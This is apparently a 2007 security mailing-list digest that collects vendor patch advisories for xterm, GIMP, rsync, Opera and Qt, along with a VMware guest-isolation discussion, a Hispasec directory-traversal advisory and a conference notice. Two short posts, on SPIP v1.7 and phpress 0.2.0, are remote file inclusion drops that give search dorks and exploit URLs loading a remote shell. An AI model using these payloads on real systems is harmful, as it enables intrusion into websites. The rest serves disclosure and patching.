rPSA-2007-0169-1 xterm
rPath Security Advisory: 2007-0169-1 Published: 2007-08-23 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local User Deterministic Unauthorized Access Updated Versions: xterm=/[EMAIL PROTECTED]:devel//1/202-5.3-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2797 https://issues.rpath.com/browse/RPL-1396 Description: Previous versions of the xterm package assigned incorrect ownership and write permissions to pseudo-terminal devices, permitting local users to direct output to other users' xterm sessions. Due to xterm's extensive internal processing of escape sequences, this also permits unauthorized modification of xterm session behavior. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDKSA-2007:170 ] - Updated gimp packages fix input data validation issues in several plugins
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:170 http://www.mandriva.com/security/ ___ Package : gimp Date: August 23, 2007 Affected: 2007.0, 2007.1, Corporate 3.0 ___ Problem Description: Multiple integer overflows in the image loader plug-ins in GIMP before 2.2.16 allow user-assisted remote attackers to execute arbitrary code via crafted length values in (1) DICOM, (2) PNM, (3) PSD, (4) PSP, (5) Sun RAS, (6) XBM, and (7) XWD files. (CVE-2006-4519) Integer overflow in the seek_to_and_unpack_pixeldata function in the psd.c plugin in Gimp 2.2.15 allows remote attackers to execute arbitrary code via a crafted PSD file that contains a large (1) width or (2) height value. (CVE-2007-2949) Victor Stinner has discovered several flaws in file plug-ins using his fuzzyfier tool fusil. Several modified image files cause the plug-ins to crash or consume excessive amounts of memory due to insufficient input validation. Affected plug-ins: bmp, pcx, psd, psp (*.tub). (CVE-2007-3741) Updated packages have been patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4519 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3741 ___ Updated Packages: Mandriva Linux 2007.0: bf9edb14123c54a69c8b767e4ff9b59b 2007.0/i586/gimp-2.3.10-6.4mdv2007.0.i586.rpm 25c09088a30f1ac4a619671f971abd65 2007.0/i586/gimp-python-2.3.10-6.4mdv2007.0.i586.rpm b406215f9a2fd22d48bd28cd2b7aa5c1 2007.0/i586/libgimp2.0-devel-2.3.10-6.4mdv2007.0.i586.rpm 493176b6d9268753888d5ed88fe82d73 2007.0/i586/libgimp2.0_0-2.3.10-6.4mdv2007.0.i586.rpm 6ff93a240bbed2cb1f2a7d43db465c5b 2007.0/SRPMS/gimp-2.3.10-6.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 3b0a82327d1c57c9d92edf2810502cc2 2007.0/x86_64/gimp-2.3.10-6.4mdv2007.0.x86_64.rpm aa6969a3c734d5233ea1bf918068b655 2007.0/x86_64/gimp-python-2.3.10-6.4mdv2007.0.x86_64.rpm 28086552988cf08d50a2196a5683a893 2007.0/x86_64/lib64gimp2.0-devel-2.3.10-6.4mdv2007.0.x86_64.rpm f85032c7fe1e839c7dae7f0f4f71b19d 2007.0/x86_64/lib64gimp2.0_0-2.3.10-6.4mdv2007.0.x86_64.rpm 6ff93a240bbed2cb1f2a7d43db465c5b 2007.0/SRPMS/gimp-2.3.10-6.4mdv2007.0.src.rpm Mandriva Linux 2007.1: 8b2d18fbd2ec2d1d75467c875b51194a 2007.1/i586/gimp-2.3.14-3.3mdv2007.1.i586.rpm eafdff0cbdfa2c5987083d66aab6acf7 2007.1/i586/gimp-python-2.3.14-3.3mdv2007.1.i586.rpm 0547d89384937df347d4bc0141c4ad58 2007.1/i586/libgimp2.0-devel-2.3.14-3.3mdv2007.1.i586.rpm efde967b2b2f0600b6f6637c0d234a01 2007.1/i586/libgimp2.0_0-2.3.14-3.3mdv2007.1.i586.rpm 23426e0e7ef3735cb4392aab2631122b 2007.1/SRPMS/gimp-2.3.14-3.3mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4828d4abf93c14331f7f17be448c2ab8 2007.1/x86_64/gimp-2.3.14-3.3mdv2007.1.x86_64.rpm 07ec9f3807b3732767c56882c5700af7 2007.1/x86_64/gimp-python-2.3.14-3.3mdv2007.1.x86_64.rpm 275cdb72761ed809e21c495bef4aebe7 2007.1/x86_64/lib64gimp2.0-devel-2.3.14-3.3mdv2007.1.x86_64.rpm bc21d6fe79269a20a4e8cf581ec15e73 2007.1/x86_64/lib64gimp2.0_0-2.3.14-3.3mdv2007.1.x86_64.rpm 23426e0e7ef3735cb4392aab2631122b 2007.1/SRPMS/gimp-2.3.14-3.3mdv2007.1.src.rpm Corporate 3.0: 0dcdab9693c953ac71ffd48f3df99502 corporate/3.0/i586/gimp-1.2.5-13.4.C30mdk.i586.rpm c7911c3c8d3cbf6c7c0a996e24fd2f0b corporate/3.0/i586/gimp-doc-1.2.5-13.4.C30mdk.i586.rpm 106fef8a8de6f8c18acbdfee686acf37 corporate/3.0/i586/gimp-perl-1.2.5-13.4.C30mdk.i586.rpm d1dfe6d9f1399bffcc6da9a775104312 corporate/3.0/i586/libgimp1.2-1.2.5-13.4.C30mdk.i586.rpm 1d000ff63592903fd2f761d838699fea corporate/3.0/i586/libgimp1.2_1-1.2.5-13.4.C30mdk.i586.rpm 97b6a130d96da091eb26da1ac54ebcd4 corporate/3.0/i586/libgimp1.2_1-devel-1.2.5-13.4.C30mdk.i586.rpm df25d5dc833ca512a0d31f839bdf7474 corporate/3.0/SRPMS/gimp-1.2.5-13.4.C30mdk.src.rpm Corporate 3.0/X86_64: 7d6a3c0448b39a0b3194a73dbf9e5b19 corporate/3.0/x86_64/gimp-1.2.5-13.4.C30mdk.x86_64.rpm 4e243e82b04fdddf71845d04c75595cf corporate/3.0/x86_64/gimp-doc-1.2.5-13.4.C30mdk.x86_64.rpm ac826ac35fe04e0bc591cb4612cbe30d corporate/3.0/x86_64/gimp-perl-1.2.5-13.4.C30mdk.x86_64.rpm c9d1fb6e82830ce6502ec1cc56a99b43 corporate/3.0/x86_64/lib64gimp1.2-1.2.5-13.4.C30mdk.x86_64.rpm 3ab4ea172a56d2e4d85025e65c8fdd91 corporate/3.0/x86_64/lib64gimp1.2_1-1.2.5-13.4.C30mdk.x86_64.rpm bb3d1d4b0bd1519bc452e08bae9b23a5 corporate/3.0/x86_64/lib64gimp1.2_1-devel-1.2.5-13.4.C30mdk.x86_64.rpm df25d5dc833ca512a0d31f839bdf7474 corporate/3.0/SRPMS/gimp-1.2.5-13.4.C30mdk.src.rpm __
Re: VMWare poor guest isolation design
On Wed, 22 Aug 2007, M. Burnett wrote: I have run across a design issue in VMware's scripting automation API that diminishes VM guest/host isolation in such a manner to facilitate privilege escalation, spreading of malware, and compromise of guest operating systems. VMware's scripting API allows a malicious script on the host machine to execute programs, open URLs, and perform other privileged operations on any guest operating system open at the console, without requiring any credentials on the guest operating system. Furthermore, the script can execute programs even if you lock the desktop of the guest OS. For example, if a non-admin user is logged in at the vm host, but logged in to guest operating systems as an administrator, the script running as a non-admin on the host can still execute admin-level scripts on the guests. I obviously did not discover this issue--the API developers provided it as a feature-I am simply pointing out the potential danger, that it was a poor design decision, and that there is a need to establish best practices for virtual machine guest and host isolation. I don't see this as a serious problem. This is the virtual equivalent of no physical security. If the host OS (or an account within it) is compromised, of course all bets are off when it comes to a virtual machine running within it. Furthermore, this attack only works if you are running the vmware guest utilities *and* you are currently logged into a GUI desktop running the vmware userland process. I personally look at this as an issue for Windows. I personally don't install the vmware guest software for my Linux VMs, nor would I log into a GUI as root. For that matter, if you are merely hosting the guest VMs why would you need to ever use the vmware console after installation? Use a network-based access method, making the need for the vmware guest utilities unnecessary. That should be sufficient for all OS'es. In (not so) short, this attack vector is virtually worthless if reasonable security practices are employed. --Arthur Corliss Live Free or Die
X-Diesel Unreal Commander v0.92 (build 573) multiple vulnerabilities
HISPASEC Security Advisory http://blog.hispasec.com/lab/ Name : X-Diesel Unreal Commander v0.92 (build 573) multiple vulnerabilities Class: Local/Remote multiple directory traversal (Input Validation Error) Threat level : HIGH Discovered : 2007-08-09 Published: 2007-08-23 Credit : Gynvael Coldwind Vulnerable : 0.92 (build 573), 0.92 (build 565), prior also may be affected == Abstract == Unreal Commander is an award winning freeware file manager for Windows 98/ME/2000/XP/2003/Vista. The application support multiple archive formats, has a built-in ftp client, and other features. Unreal Commander fails to check user-supplied input while processing ZIP and RAR archives. A malformed ZIP or RAR file can be used to perform a directory traversal attack and place malware files in a location selected by the attacker. Successful exploitation can lead to a full compromitation of the system. == Details == 1. ZIP directory traversal The file name in a ZIP archive in the central directory can be malformed so that it contains upwards directory traversal, for example: Something/../../../../../../Program Files/Something/ws2_32.dll If the user upacks such an archive, the Unreal Commander will create the file ws2_32.dll in the specified directory, instead of the directory where the user wants to extract it. This may lead to system compromitation, especially if the user executes Unreal Commander with admin privileges. PoC: http://blog.hispasec.com/lab/files/UnrealCommander_PoC_traversal.zip 2. ZIP name spoofing A ZIP archive contains two places where a file's name is written: Local file header and Central Directory. Unreal Commander displays the file name according to the Central Directory, but extracts the file with the name from the Local File Header. This is may misinform the user about the files contained in the archive. This can help an attacker to trick the user into extracting a dangerous file (for example, an .ani file on an unpacked Windows). PoC: http://blog.hispasec.com/lab/files/UnrealCommander_PoC_spoof.zip 3. ZIP file size heap information leak If the ZIP has a malformed file size in the file header, then Unreal Commander writes to the file data from the heap. This could allow potential information leak (ftp passwords ?), but this has not been confirmed. 4. RAR directory traversal Like point 1, but regarding to RAR format. == Vendor status and solution == The vendor has been informed, but has not yet released a proper patch. The solution is to check if a RAR or ZIP file contains ".." in the names of the files in the archives. It is also advised not to run Unreal Commander with administrative privileges. == Disclaimer == This document and all the information it contains is provided "as is", without any warranty. Hispasec Sistemas is not responsible for the misuse of the information provided in this advisory. The advisory is provided for educational purposes only. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. Copyright (C) 2007 Hispasec Sistemas. -- Gynvael Coldwind mailto: [EMAIL PROTECTED] mailto: [EMAIL PROTECTED]
Re: TeamSpeak 2 Server Vulnerabilities?
Dear lehox, See e.g. http://securityvulns.com/Rdocument6.html --Wednesday, August 22, 2007, 1:00:47 AM, you wrote to bugtraq@securityfocus.com: l> Hello, l> I have heard something about TeamSpeak 2 Server vulnerabilities l> but never found any full disclosure of it. Does somebody know something l> about it? l> Greetings -- ~/ZARAZA http://securityvulns.com/
SPIP v1.7 Remote File Inclusion Bug
+++ SPIP v1.7 Remote File Inclusion Bug ! ++ ++DORK : "/SPIP-v1-7-2/" ++ +--+ +--+ ++ ++ Bug in : "SPIP-v1-7r/inc-calcul.php3" ++-- ++ Vlu Code: - ++ || include($squelette_cache); || ++- ++ ++== ++ Exploit : ++ ++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL? ++ ++== ++ +|Discoverd By :Darkdewil[system-eor]|++ ++ ++ ++|Conatact : system-eor[at]hotmail[dot]com |+++ ++ ++ |Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+ ++ ++ |sPECial THanks to :1923turk - grup| ++ ++
Reminder: HITBSecConf2007 - Malaysia is less than 2 weeks away
HITBSecConf2007 - Malaysia is a mere 2 weeks away! Organized as a community centric, non-profit effort, HITBSecConf is Asia's largest network security event featuring 4 keynote speakers, 7 tracks of technical training sessions and access to over 30 hours of deep knowledge demos and presentations! Date: 3rd - 6th September 2007 Venue: Hilton KL Sentral Time: 0900 - 1800 What's on the menu - 7 tracks of hands on technical training sessions (3rd & 4th) - 4 keynote speakers (Mark 'Phiber Optik' Abene, Emmanuel Goldstein, Mikko Hypponen and Lance Spitzner!) - Lock Picking Village (run by members of TOOOL USA) - Capure The Flag (team-based hacking competition with 11 teams from around the world confirmed) - BZFlag Area Some of the highlight conference presentations: - Hacking Biometric Systems - High Security Locks - Illusion or Reality? - How to 0wn Critical National Infrastructure - Hacking SCADA - RDS-TMC Injection: How to Freak Out Your Sat Nav Systems - Attacking Cisco NAC - Hacking Hardened and Secured Oracle Servers PLUS an exclusive presentation on WABISABILABI - The Exploit Marketplace Project by their Director of Strategy, who will be taking questions from the audience and speaking on the purpose of the project and it's future plans. Walk in registrants are accepted and the area where the lock picking village, bzflag competition, zone-h hacking challenge and the capture the flag 'live hacking' competition is being held is FREE AND OPEN TO PUBLIC. So do come and check it out. :) If you haven't registered yet, there's still time to do so but do note that prices increase after 31st August 2007. For further details, please see: http://conference.hitb.org/hitbsecconf2007kl/
VMWare poor guest isolation design
I have run across a design issue in VMware's scripting automation API that diminishes VM guest/host isolation in such a manner to facilitate privilege escalation, spreading of malware, and compromise of guest operating systems. VMware's scripting API allows a malicious script on the host machine to execute programs, open URLs, and perform other privileged operations on any guest operating system open at the console, without requiring any credentials on the guest operating system. Furthermore, the script can execute programs even if you lock the desktop of the guest OS. For example, if a non-admin user is logged in at the vm host, but logged in to guest operating systems as an administrator, the script running as a non-admin on the host can still execute admin-level scripts on the guests. I obviously did not discover this issue--the API developers provided it as a feature-I am simply pointing out the potential danger, that it was a poor design decision, and that there is a need to establish best practices for virtual machine guest and host isolation. Background Virtual machines have become a more integral part of the computing world and are playing an increasing role in IT infrastructures. It is not uncommon to use virtual machines for everything from testing to critical server roles. One benefit of using virtual machines is that it allows you to work with several operating systems on the same machine and provides effective isolation between each operating system. The VIX API provides an interface to manipulate virtual machines from the host machine. This API is available on any machine with VMware Server or Workstation installed. Certain commands-such as RunProgramInGuest -do require authentication to run commands on a VMware guest OS, you can instruct them to use the credentials of the user currently logged in at the console. If no user is currently logged in, the command can wait until the next user does log in. The risk here is that although the guest OS is a separate operating system environment, a script on the host machine can still execute programs in any guest machine without knowing any actual login credentials. This would allow malware to propagate to guest OS's without any additional credentials. Scenario Many IT professionals have begun to use virtual machines for critical infrastructure systems. In my own environment I use specialized virtual machines for development and administration. The snapshot features and easy backup capabilities of virtual machines make them convenient for dedicated administrative environments. Since I-as well as many administrators-normally stay logged in to my desktop as a non-admin user, it is convenient to have separate virtual machines for performing administrative functions. I have also done this to gain further isolation so that normal PC activities such as browsing the Internet and reading e-mail do not compromise administrative access to my network. The problem is that a malicious script running within the context of a regular user on my desktop can run administrator-level scripts on any guest I am currently logged in to. Using Ctrl+Alt+Del to lock the desktop of those machines does not prevent VIX from executing commands on the guest. Even if I log out of each guest machine the malware can just queue the command to run the next time I log in at the console of the guest OS. Remediation I contacted VMWare about this issue several months ago and they responded that his was "a very difficult design choice". Their response was that anyone who is able to connect to a guest via the VIX api would also have the capability of accessing the virtual disk files of the machine and compromise the guest that way as well. While that is true, it is also possible to use full disk encryption and other countermeasures that prevent access to a host resulting in compromise of the guests. Furthermore, being able to automate something is a big deal when it comes to spreading malware. Give me access to any system on a foreign network with user-level credentials and before too long I can acquire full admin access, but for a worm to be able to automate that in seconds is something completely different. But rather than try to argue with VMWare about the severity of the issue, I chose to simply make you all aware that the potential is there and you can decide for yourselves. Fortunately, there is an undocumented switch to turn this off. In the VMX config file, you can add the following: guest.commands.anonGuestCommandsRunAsConsoleUser=FALSE You can also set this on the host-wide configuration file, so it will override the config setting in every VM. So with that, I would like to establish a best practice for virtual machine guest/host isolation: A virtual server host should never provide any mechanism that, by default, allows guest-to-host or host-to-guest access without having to follow standard authentication procedures and protocols for the target operating system.
rPSA-2007-0168-1 rsync
rPath Security Advisory: 2007-0168-1 Published: 2007-08-22 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote User Deterministic Unauthorized Access Updated Versions: rsync=/[EMAIL PROTECTED]:devel//1/2.6.8-1.1-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4091 https://issues.rpath.com/browse/RPL-1647 Description: Previous versions of the rsync package contain multiple buffer-overflow vulnerabilities, possibly allowing remote attackers to execute arbitrary code using maliciously crafted directory names. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
phpress 0.2.0 (adisplay.php) Remote File Inclusion
:::. .. ::| \ | (_) | \ | | / | ::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _ __ ::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | || '__/ _ \ \ /\ / / ::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | || | | __/\ V V / ::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_|_| \___| \_/\_/ :We got the nicest name in the security scene! Info::. ::Script: phpress ::Version: 0.2.0 ::Homepage:http://sourceforge.net/projects/phpress/ :: :Details::. ::Type: Remote_File_Inclusion ::Dork: allinurl:/phpress/ ::Exploit: http://host/phpress/adisplay.php?lang=shell :: :: ::Variable lang is not defined :: . :::Additional_Information::. :. ::Contact: [EMAIL PROTECTED] ::Website: none yet :.
[ GLSA 200708-17 ] Opera: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200708-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: August 22, 2007 Bugs: #185497, #188987 ID: 200708-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Opera contain several vulnerabilities, some of which may allow the execution of arbitrary code. Background == Opera is a multi-platform web browser. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/opera < 9.23 >= 9.23 Description === An error known as "a virtual function call on an invalid pointer" has been discovered in the JavaScript engine (CVE-2007-4367). Furthermore, iDefense Labs reported that an already-freed pointer may be still used under unspecified circumstances in the BitTorrent support (CVE-2007-3929). At last, minor other errors have been discovered, relative to memory read protection (Opera Advisory 861) and URI displays (CVE-2007-3142, CVE-2007-3819). Impact == A remote attacker could trigger the BitTorrent vulnerability by enticing a user into starting a malicious BitTorrent download, and execute arbitrary code through unspecified vectors. Additionally, a specially crafted JavaScript may trigger the "virtual function" vulnerability. The JavaScript engine can also access previously freed but uncleaned memory. Finally, a user can be fooled with a too long HTTP server name that does not fit the dialog box, or a URI containing whitespaces. Workaround == There is no known workaround at this time for all these vulnerabilities. Resolution == All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/opera-9.23" References == [ 1 ] CVE-2007-3142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3142 [ 2 ] CVE-2007-3819 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3819 [ 3 ] CVE-2007-3929 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3929 [ 4 ] CVE-2007-4367 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4367 [ 5 ] Opera Advisory 861 http://www.opera.com/support/search/view/861/ Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200708-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpEm5wdNTnmU.pgp Description: PGP signature
[ GLSA 200708-16 ] Qt: Multiple format string vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200708-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Qt: Multiple format string vulnerabilities Date: August 22, 2007 Bugs: #185446 ID: 200708-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Format string vulnerabilities in Qt 3 may lead to the remote execution of arbitrary code in some Qt applications. Background == Qt is a cross-platform GUI framework, which is used e.g. by KDE. Affected packages = --- Package / Vulnerable / Unaffected --- 1 x11-libs/qt < 3.3.8-r3>= 3.3.8-r3 Description === Tim Brown of Portcullis Computer Security Ltd and Dirk Mueller of KDE reported multiple format string errors in qWarning() calls in files qtextedit.cpp, qdatatable.cpp, qsqldatabase.cpp, qsqlindex.cpp, qsqlrecord.cpp, qglobal.cpp, and qsvgdevice.cpp. Impact == An attacker could trigger one of the vulnerabilities by causing a Qt application to parse specially crafted text, which may lead to the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All Qt 3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "=x11-libs/qt-3*" References == [ 1 ] CVE-2007-3388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200708-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpOpwvgzqX4w.pgp Description: PGP signature